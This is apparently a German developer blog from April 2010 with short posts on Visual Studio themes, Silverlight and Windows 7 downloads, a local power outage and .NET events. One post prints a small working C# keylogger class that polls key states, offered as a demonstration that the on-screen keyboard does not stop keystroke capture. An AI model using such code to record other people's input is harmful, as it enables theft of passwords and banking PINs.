Freitag, 23. April 2010

Visual Studio Styles Gallery - Quelltextformatierung wechsel dich!

Immer mehr Entwickler schalten um auf eine inverse Anzeige der Quelltextanzeige im Visual Studio, oder ändern wenigstens teilweise die Farben, um den Quelltext besser und für’s Auge angenehmer zu gestalten.

Leider fehlt mir oft die Zeit darüber Gedanken zu machen, bzw. die vielen Farben zu verändern, damit zu arbeiten, und dann hinterher doch wieder alles zurück zu stellen.

Dafür gibt es jetzt eine Sammlung:

image

Auf http://studiostyles.info/ findet ihr tolle Visual Studio Farbschemata (heißt das jetzt wirklich so?) zum runterladen… und wenn ihr selber meint, eure Farben sind die besten, dann könnt ihr das Farbschema auch hochladen.

Hier mal ein Vorgeschmack:

image

Viel Spaß beim Ausprobieren…!

Heißt Google Mail in Deutschland jetzt wieder Gmail?

Immer wenn ich ins Ausland fahre, dann stelle ich wieder fest, dass Gmail in Deutschland eben Google Mail heißt, und dass auch die Anmeldeseite bei Gmail anders aussieht.

Eines der ersichtlichen Änderungen ist das Google Mail Logo als auch die eingebetteten RSS Nachrichten vom Gmail Blog.

Heute stelle ich aber fest, das dem nicht mehr so ist.

image

Ist das nur ein Fehler bei Google, oder dürfen die jetzt wieder Gmail heißen.

Update: Ok, verstanden… liegt wohl daran, dass Google meinen Ort nicht feststellen konnte.

image

Tastatureingaben mit C# aufzeichnen – KeyLogger auf .NET

Nach meinem Artikel Die Bildschirmtastatur bringt keine Sicherheit beim Online Banking bin ich jetzt schon öfters angesprochen worden, wie man denn Tastatureingaben überwachen kann. Nachfolgend mal meine kleine KeyLogger Klasse in C#:

using System;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace MS.Util
{
  public class KeyLogger
  {
    [DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(int vKey);
    [DllImport("User32.dll")]
    private static extern short GetAsyncKeyState(Keys vKey);

    public void Read()
    {
      try
      {
        foreach (int i in Enum.GetValues(typeof(Keys)))
        {
          if (GetAsyncKeyState(i) == -32767)
          {
            Console.Write(Enum.GetName(typeof(Keys), i) + " ");
          }
        }
      }
      catch (Exception ex)
      {
      }
    }
  }
}

Die Methode Read() muss man jetzt nur schnell genug hintereinander aufrufen, dann sieht man in einer Konsolenanwendung die gedrückten Tasten. Viel Spaß beim Ausprobieren, gerade auch mit einer Bildschirmtastatur!

Silverlight 4 Training Kit – Kostenloser Download

image Nachdem Microsoft nun Silverlight 4 fertig hat, hat Scott Guthrie gestern noch einmal erinnert, dass es ein kostenloses Silverlight 4 Training Kit gibt, unter anderem mit folgenden Themen:

  • What’s New in Silverlight 4
  • Silverlight 4 New Features
  • Silverlight 4 Business Apps: Module 1- Introduction
  • Silverlight 4 Business Apps: Module 2 – Event Manager using WCF RIA Services
  • Silverlight 4 Business Apps: Module 3 – User Registration with Authentication, Validation, Rich Text, Styling and Commands
  • Silverlight 4 Business Apps: Module 4 – User Profile with Drop Target, Webcam, Clipboard
  • Silverlight 4 Business Apps: Module 5 – Schedule Planner with Grouping and Right Click
  • Silverlight 4 Business Apps: Module 6 – Printing the Schedule
  • Silverlight 4 Business Apps: Module 7 – Event Dashboard Running Out of Browser
  • Silverlight 4 Business Apps: Module 8 – Advanced Out of Browser and MEF

Das Trainings Kit kann man nicht nur online anschauen (25 Videos und Hands on Labs), sondern auch als komplettes Paket herunterladen.

Donnerstag, 22. April 2010

Windows 7 (Multi) Touch Pack als Download verfügbar

Gerade bei Stephan gelesen, Windows 7 Touch Pack nun öffentlich verfügbar.

Microsoft hat das Windows 7 Touch Pack, welches die neuen Möglichkeiten der mit Windows 7 eingeführten Multitouch-Oberfläche eindrucksvoll demonstriert, nun zum öffentlichen Download freigegeben. Bisher war das Paket nur OEMs zugänglich, die es auf entsprechenden Computern mit berührungsempfindlichen Bildschirmen vorinstallieren konnten.

Ab zum Download (Microsoft)…

The Microsoft Touch Pack for Windows 7 is a collection of games and applications that are made available to computers with multi-touch enabled displays running Windows 7.
The Touch Pack includes:

  • Microsoft Blackboard, an intricate game of physics in which you solve a puzzle by creating a fanciful machine on a blackboard.
  • Microsoft Garden Pond, a tranquil game that takes place in serene Japanese water gardens.
  • Microsoft Rebound, a game in which you use your fingertips to control Tesla spheres with an electrical field between them to catapult a metal game ball into your opponent's goal.
  • Microsoft Surface Globe, a program that you can use to explore the earth as a flat 2-D map or as an immersive 3-D experience.
  • Microsoft Surface Collage, a program that you can use to explore and interact with your photos and arrange them as a desktop background.
  • Microsoft Surface Lagoon, a screen saver and interactive water simulation, complete with a meditative rock arrangement and playful, shy fish.

Viel Spaß!

Mittwoch, 21. April 2010

Die Bildschirmtastatur bringt keine Sicherheit beim Online Banking

Gerade lese ich einen Beitrag auf windows7news.com bzgl. dem Zeus Virus.

"We expect this new version of Zeus to significantly increase fraud losses, since nearly 30% of internet users bank online with Firefox and the infection is growing faster than we have ever seen before," said Amit Klein, chief technology officer at Trusteer.

Weiter wird dann geraten folgendes geraten, das klingt ja erst einmal ganz gut:

Windows XP, Vista and Windows 7 also include as standard an on-screen keyboard.  This can be used when logging into websites, especially banking sites, to make the process much more secure.

Man soll also die Bildschirmtastatur verwenden, damit böse Programme die Eingaben (Benutzernamen, Kennwörter, PIN/TANs,…) nicht aufzeichnen können.

image

Hm, das musste ich mal schnell ausprobieren. Also Visual Studio gestartet (ja, sogar das ganz neue Zwanzigzehn), ein paar Zeilen geschrieben… ausprobiert, und?

Die Bildschirmtastatur schützt NICHT vor Programmen, die die Tastatureingaben auf irgendwelche Abfragen überwachen. Ich habe ein kleines Testprogramm geschrieben, damit geht’s auf jeden Fall.

Ich persönlich verwende lieber einen virtuellen PC, den ich immer wieder in den Grundzustand versetze, und auch sonst nichts im Internet mache. Auch sollte natürlich die AntiViren Software auf dem aktuellen Stand sein.

Update: komisch, wenn man bei Google sucht, dann findet man noch mehr von diesen Tipps. Ist das nur ein Problem von Windows 7, oder bin ich zu dumm dafür?

Nette MacBook Docking Station

Henge Docks bietet richtig nette Docking Stations für MacBook und MacBook Pro an, und das für einen Preis von $59.95 mit einer 30-Tage Zufriedenheitsgarantie:

 dockingstationimage

Schade nur, dass nicht gleich ein Mini Display Port auf DVI Adapter mit eingebaut ist, den muss man selber dazukaufen.

Internet oder Strom, was ist wichtiger? Stromausfall in Nürnberg / Stein

Gestern Abend sitze ich mit meinem MacBook (ja, ich versuche mich im Moment an der iPhone Entwicklung) im Wohnzimmer, ärgere mich, dass das Netzteil irgendwie schon im Eimer ist. Kurze Zeit später bekomme ich Besuch, die klopfen an die Haustür anstatt zu klingeln, immer noch kein Verdacht. Weitere 10 min später und ich bemerke, dass mein Internet nicht geht, Stromausfall, alles tot. Geschäfte mussten schließen, Ampeln funktionieren nicht mehr…

Am Dienstag, den 20.04.2010 kam es aus noch ungeklärter Ursache gegen 17.25 Uhr zu einer technischen Störung in einer Schaltanlage in der Gebersdorfer Straße. Durch den daraufhin entstandenen Stromausfall gab es rund zweieinhalb Stunden keine Elektrizität in den Stadtteilen Gebersdorf, Eibach, Katzwang, Stein und Teilen Oberasbachs. Die Feuerwehr aus  Nürnberg und Stein rückte in den ersten 90 Minuten des Stromausfalls zu neun Einsätzen aus.

Die U-Bahnen fuhren zwar, doch an den Bahnhöfen war nur Notbeleuchtung eingeschaltet. Stellenweise fielen Rolltreppen und Aufzüge aus. Viele Läden im Röthenbacher Einkaufszentrum waren stockdunkel. Sie wurden vorzeitig dichtgemacht.

Nettes Geburtstagsgeschenk, muss ich schon sagen. So haben wir dann die 2 Stunden im Dunkeln (ok, es war noch nicht wirklich Nacht) verbracht, was natürlich auch so seinen Reiz hatte.

Sehr interessant zu beobachten war, dass kurz vor dem Ende des Stromausfalls der Strom wieder da war, aber vielleicht nur um die 30 Prozent; die Lampen glühten wie bei einem Sonnenuntergang. Ein paar Sekunden später war der Strom dann wieder weg, und es dauerte noch einmal um die 20 min, bis wir dann endgültig wieder Strom hatten.

Da der Stromausfall auch den Nürnberger Fernsehturm lahmlegte, war in der Umgebung auch kein Fernsehprogramm mehr zu empfangen. Zahlreiche Bürger riefen besorgt bei der Feuerwehr oder der Polizei an, um nähere Informationen zu den Vorkommnissen zu bekommen.

Toll, das war für uns jedenfalls eher uninteressant. Erwähnenswert ist vielleicht noch, dass Handytelefonate eigentlich immer funktionierten, das mobile Internet aber nicht. Es scheint so zu sein, dass entweder Internet für die mobilen Datengeräte noch nicht “wichtig” genug ist, oder aber die Internetanbindung nach dem Sendemast kein Strom mehr hatte.

Seit ca. 1/2 Jahr zeichne ich alle möglichen Stromwerte wie Volt, Ampere, Watt aller drei Phasen getrennt auf, in einem Intervall von 10 Sekunden. Ob ich dort vielleicht etwas erkennen kann? Ich werde mich heute Abend mal an die Aufzeichnungen machen.

Ich habe gestern mal wieder gemerkt, wie wichtig es ist, Strom 24h, 7 Tage die Woche zu haben. Für mich war das wohl der erste nicht selbst verursachte und unangekündigte Stromausfall. In Zukunft wird das wohl öfters vorkommen, die Stromnetze sind wohl relativ alt, und es wurde nur wenig investiert in den letzten Jahren.

Dienstag, 20. April 2010

.NET Community-Konferenz Franken (Nürnberg) am 26. Juni 2010

Am 26. Juni 2010 findet in Nürnberg die erste .NET Community-Konferenz Frankens, der .NET Day Franken statt. Bei diesem Event dreht sich einen Tag lang alles um moderne, professionelle Softwareentwicklung mit dem .NET Framework. Neben den angebotenen Vorträgen steht vor allem die Diskussion und das Networking mit anderen .NET Begeisterten im Mittelpunkt.

image Passend zur Veröffentlichung des neuen Visual Studio 2010 am 12. April widmet sich der erste .NET Day Franken den Themen Visual Studio 2010, .NET Framework 4 und C# 4.0. Zusätzlich dazu werden technologieübergreifende Themen wie TDD (Test-Driven-Development), verteilte und agile Softwareentwicklung die Konferenz begleiten.

Die Agenda der Veranstaltung wird gerade  auf unserer Webseite www.dotnet-day-franken.de zusammengestellt und es werden auch noch Sprecher gesucht. Neben bekannten Namen möchte der .NET Day Franken auch bisher unbekannten Sprechern eine Plattform bieten.

Sicher Dir bis zum 20. Mai 2010 Deinen Eintritt auf die Konferenz mit dem attraktiven Frühbucherpreis. Du kannst  aber auch mit Gruppenanmeldungen bares Geld sparen. Mehr dazu findest Du unter Anmeldung auf unserer Homepage.

Veranstaltungsort ist das Hotel: NH Nürnberg City, Bahnhofstrasse 17-19, 90402 Nürnberg

Wir sehen uns!!

Microsoft Web Camp – Kostenlose Veranstaltung zum Thema Web Entwicklung

webcamp Am 7. und 8. Juni wird die Web Camp-Reihe neben Metropolen wie Moskau, Sydney, Peking, London und New York auch in Deutschland halt machen.

Die kostenlose Veranstaltung richtet sich an alle Web-Entwickler. Mit dabei sind Scott Guthrie, James Senior, Scott Hanselman und Jon Galloway.

Mehr zur Agenda und die Anmeldung gibt’s unter http://www.webcamps.ms/.

Windows Phone 7 TechTalk im Juni

Im Juni gibt’s in einigen Städten wieder ein TechTalk zu einem interessanten Thema, Windows Phone 7 (und ja, das Series im Namen wurde gestrichen).

Hier sind die Termine:

Mehr Infos wie immer bei Frank (Dr. Mobile).